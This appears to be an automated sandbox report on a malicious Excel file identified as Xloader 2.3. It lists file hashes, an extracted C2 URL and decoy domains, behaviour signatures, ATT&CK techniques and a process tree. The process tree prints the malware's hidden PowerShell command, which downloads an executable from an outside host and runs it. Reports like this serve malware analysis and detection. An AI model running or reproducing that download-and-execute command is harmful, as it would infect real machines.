Overview

overview

10

Static

static

8

W029621.xls

windows7_x64

10

W029621.xls

windows10_x64

1

Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-04-2021 03:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    W029621.xls

  • Size

    342KB

  • MD5

    dcb68156748e6c71ef5df8d9dddb3ff6

  • SHA1

    ffee33ce2a6b4523a5f7323ca00a7347b1dc986a

  • SHA256

    7da573f1004e4bb9c6979a6ccca45da8998deaa92dd1e318d128ff4888212536

  • SHA512

    eb24bd095799613417aaf3b0d8344af0cfce01d9700379e5e3ed7b8eff3f0d5abd3606866704a871aa0e2469b84ca24ce2416a590711329695ed0e700276186e

Score
10/10
xloaderloaderpersistencerat

Malware Config

Extracted

Family

xloader

Version

2.3

C2

http://www.preciousvessel.com/spj6/

Decoy

kdelchev.com

myriamward.com

megaconsulting.pro

sunglassesmu.com

hispanavisionct.com

bodaciousbuffy.com

chuhuu.com

jerexcursion.com

merkabahindustries.com

shaktiroommontreal.com

violet-moon-interior-design.com

pyrosunited.com

89xs.xyz

bestchatonline.com

cubiscoin.com

ianzu.com

playersresearch.com

digitalvl.com

baans-barw.com

yuria-rain.com

Signatures

  • Xloader

    Xloader is a rebranded version of Formbook malware.

    loaderxloader
  • Xloader Payload 3 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\W029621.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2004
    • C:\Windows\SysWOW64\NETSTAT.EXE
      "C:\Windows\SysWOW64\NETSTAT.EXE"
      2⤵
      • Suspicious use of SetThreadContext
      • Gathers network information
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe"
        3⤵
          PID:572
    • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w Hidden Invoke-WebRequest -Uri "http://iklangratissurabaya.skom.id/zx/Fsbey.exe" -OutFile "C:\Users\Public\Documents\issuepolitical.exe";C:\Users\Public\Documents\issuepolitical.exe
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Users\Public\Documents\issuepolitical.exe
          "C:\Users\Public\Documents\issuepolitical.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
            C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:820

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Command-Line Interface

    1
    T1059

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • C:\Users\Public\Documents\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • C:\Users\Public\Documents\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • \Users\Admin\AppData\Local\Temp\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • \Users\Public\Documents\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • \Users\Public\Documents\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • \Users\Public\Documents\issuepolitical.exe
      MD5

      8ab4c430e65defdd7b9975db28d3c92d

      SHA1

      d509f417d02c31f4ebe3a7b22448af639d62568b

      SHA256

      b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202

      SHA512

      680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b

      Download Submit
    • memory/572-112-0x0000000000000000-mapping.dmp
      Download
    • memory/748-75-0x0000000005730000-0x0000000005731000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-68-0x00000000048E0000-0x00000000048E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-65-0x0000000000000000-mapping.dmp
      Download
    • memory/748-80-0x0000000006140000-0x0000000006141000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-81-0x00000000062E0000-0x00000000062E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-88-0x00000000063E0000-0x00000000063E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-89-0x00000000064E0000-0x00000000064E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-70-0x0000000002580000-0x00000000031CA000-memory.dmp
      Filesize

      12.3MB

      Download
    • memory/748-71-0x0000000002640000-0x0000000002641000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-69-0x0000000002580000-0x00000000031CA000-memory.dmp
      Filesize

      12.3MB

      Download
    • memory/748-66-0x00000000765F1000-0x00000000765F3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/748-72-0x0000000002850000-0x0000000002851000-memory.dmp
      Filesize

      4KB

      Download
    • memory/748-67-0x0000000000A90000-0x0000000000A91000-memory.dmp
      Filesize

      4KB

      Download
    • memory/820-107-0x0000000000AD0000-0x0000000000DD3000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/820-108-0x0000000000260000-0x0000000000270000-memory.dmp
      Filesize

      64KB

      Download
    • memory/820-103-0x0000000000400000-0x0000000000428000-memory.dmp
      Filesize

      160KB

      Download
    • memory/820-104-0x000000000041D010-mapping.dmp
      Download
    • memory/1256-118-0x00000000051A0000-0x000000000527C000-memory.dmp
      Filesize

      880KB

      Download
    • memory/1256-119-0x000007FEF63C0000-0x000007FEF6503000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/1256-109-0x00000000065F0000-0x0000000006757000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/1256-120-0x000007FE95DA0000-0x000007FE95DAA000-memory.dmp
      Filesize

      40KB

      Download
    • memory/1768-110-0x0000000000000000-mapping.dmp
      Download
    • memory/1768-114-0x0000000000080000-0x00000000000A8000-memory.dmp
      Filesize

      160KB

      Download
    • memory/1768-116-0x0000000000500000-0x000000000058F000-memory.dmp
      Filesize

      572KB

      Download
    • memory/1768-113-0x00000000003A0000-0x00000000003A9000-memory.dmp
      Filesize

      36KB

      Download
    • memory/1768-115-0x0000000002220000-0x0000000002523000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/2004-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2004-61-0x0000000071CC1000-0x0000000071CC3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2004-117-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2004-60-0x000000002FF21000-0x000000002FF24000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2032-101-0x0000000000A80000-0x0000000000A81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2032-99-0x0000000000260000-0x0000000000262000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2032-100-0x0000000000530000-0x000000000056C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/2032-97-0x0000000000F60000-0x0000000000F61000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2032-93-0x0000000000000000-mapping.dmp
      Download